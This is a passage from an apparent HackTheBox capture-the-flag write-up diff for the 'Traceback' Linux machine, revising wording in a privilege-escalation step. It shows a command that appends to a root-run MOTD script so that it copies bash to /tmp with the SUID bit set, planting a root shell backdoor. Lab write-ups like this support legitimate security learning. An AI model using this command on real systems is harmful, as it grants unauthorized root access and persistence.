ryanrestine/HackTheBox_WriteUps/linux_machines/traceback_notes.md

 Cool, now that we've done that we need to overwrite the MOTD to something of our own.

-Then, back in our shell we can run:
+Back in our shell we can run:

 ```
 echo "cp /bin/bash /tmp/bash && chmod u+s /tmp/bash" >> /etc/update-motd.d/00-header